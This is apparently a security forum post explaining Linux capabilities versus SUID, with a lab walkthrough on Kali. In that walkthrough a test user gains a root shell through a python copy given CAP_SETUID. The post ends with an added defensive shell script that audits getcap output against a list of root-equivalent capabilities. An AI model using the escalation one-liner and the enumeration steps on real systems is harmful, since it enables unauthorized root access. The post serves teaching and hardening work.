The file set by setcap can be controlled, resulting in privilege escalation

enhackapt

Administrator
Staff member
Joined
Dec 10, 2024
Messages
21
Capabilities Introduction
What are Capabilities in Linux


Before capabilities existed, Linux had only a binary notion of privilege. For permission checks, traditional UNIX implementations divided processes into two categories: privileged processes (the superuser, root, with effective UID 0, which bypass all kernel permission checks) and unprivileged processes (whose effective UID is non-zero and which are subject to full permission checking).


Capabilities split the privileges traditionally bundled into the superuser into distinct, independently assignable units, so that a process (or a program file) can be granted only the capabilities it needs to perform one specific privileged task instead of full root.


Difference between Capabilities and SUID

SUID: SUID stands for Set User ID and allows a user to execute a file with the privileges of the file's owner. In other words, the user is given temporary permission to run a program under the file owner's identity instead of their own; when the owner is root, the process runs as root. SUID files are easy to detect with the "find" command. To find all files with SUID set, we use the -perm option, which matches files whose mode includes the 4000 (setuid) bit.


Command to set the SUID bit on a file, for example:

chmod u+s /usr/bin/python

Use the find command to find SUID files:

find / -perm -u=s -type f 2>/dev/null


The file set by setcap can be controlled to cause privilege escalation-1.png



Detailed explanation of setcap: Detailed explanation of setcap - Farmer Operation and Maintenance - Blog Park
setcap brief description:

The main idea of capabilities is to split the privileges of the root user into separate capabilities, each of which represents one kind of privileged operation. For example, CAP_SYS_MODULE allows the privileged operation of loading (or unloading) kernel modules, and CAP_SETUID allows the privileged operation of changing a process's user identity. With capabilities, the kernel performs access control for privileged operations based on the capabilities held by the process rather than on whether its UID is 0.

getcap: list the files that have had capabilities set with setcap

getcap -r / 2>/dev/null

The file set by setcap can be controlled to cause privilege escalation-2.png



OS: kali
Test users: root, test

First, as the root user, set the SUID bit on python:

chmod u+s /usr/bin/python

List the files with the SUID bit to confirm it was set:

find / -perm -u=s -type f 2>/dev/null



The file set by setcap can be controlled to cause privilege escalation-3.png




Copy python to the /tmp directory, mirroring the setup used in the referenced article:

cp /usr/bin/python /tmp/


The file set by setcap can be controlled to cause privilege escalation-4.png




Use setcap to grant the python copy in /tmp the CAP_SETUID capability, in both the effective (e) and permitted (p) sets:

setcap CAP_SETUID+ep /tmp/python

The file set by setcap can be controlled to cause privilege escalation-5.png



Switch to user test and execute the following commands to obtain root privileges:

getcap -r / 2>/dev/null  # list the files that have been granted capabilities


The file set by setcap can be controlled to cause privilege escalation-6.png


./python -c 'import os;os.setuid(0);os.system("/bin/bash")'


The file set by setcap can be controlled to cause privilege escalation-7.png




getcap -r / 2>/dev/null  # list the files granted CAP_SETUID to see which are worth examining; on this system the following usable files were found:

perl
python
tar
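The walkthrough above relies on getcap -r to find binaries carrying CAP_SETUID. From the defender's side, the same output is what an audit should consume: any interpreter or archiver with CAP_SETUID, CAP_SETGID, CAP_SYS_ADMIN or a DAC-bypass capability is root-equivalent, and a copy sitting in /tmp or a home directory (as /tmp/python does here) is a near-certain sign of tampering. The POSIX shell script below is an added example, not part of the original post and not a tool it references; the sample getcap lines, the DANGEROUS list and the audit_caps function are all constructed for illustration.

```shell
#!/bin/sh
# Added audit example (not from the original post): flag files whose
# file capabilities would let a local user escalate, and rank those in
# user-writable locations as critical. Input is getcap -r output.

# Constructed sample in both libcap output styles ("path = caps+ep" and
# "path caps=ep"). On a real host: getcap -r / 2>/dev/null | audit_caps
SAMPLE_CAPS='/usr/bin/ping = cap_net_raw+ep
/usr/bin/ping cap_net_raw=ep
/tmp/python = cap_setuid+ep
/home/test/perl cap_setuid,cap_setgid=ep
/usr/bin/tar = cap_dac_read_search+ep'

# Capabilities that are root-equivalent on an interpreter, shell or archiver
# (assumed list for this example; extend to match local policy)
DANGEROUS='cap_setuid cap_setgid cap_sys_admin cap_dac_override cap_dac_read_search cap_sys_module cap_sys_ptrace cap_chown cap_fowner'

# audit_caps: reads getcap-style lines on stdin and prints "SEVERITY path caps"
# for every file carrying at least one capability from DANGEROUS.
# CRIT = file lives under a user-writable or home directory;
# WARN = elsewhere, still worth reviewing against the package's expected caps.
audit_caps() {
  awk -v dangerous="$DANGEROUS" '
    BEGIN { n = split(dangerous, d, " ") }
    NF >= 2 {
      path = $1
      rest = tolower($0)
      sub(/^[^ ]+ +=? */, "", rest)          # keep only the capability text
      hits = ""
      for (i = 1; i <= n; i++)
        if (index(rest, d[i]) > 0)
          hits = hits (hits == "" ? "" : ",") d[i]
      if (hits == "") next                    # e.g. ping with cap_net_raw
      sev = "WARN"
      if (path ~ /^\/(tmp|var\/tmp|dev\/shm|home)\//) sev = "CRIT"
      print sev, path, hits
    }'
}

# Stand-alone run over the constructed sample
printf '%s\n' "$SAMPLE_CAPS" | audit_caps
```

The capability names are lowercased before matching because getcap prints them in lowercase while setcap accepts either case (the post uses CAP_SETUID+ep). Lines for ping carrying only cap_net_raw are dropped, /tmp/python and the perl copy under /home are reported as CRIT, and /usr/bin/tar with cap_dac_read_search is reported as WARN for manual review.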
 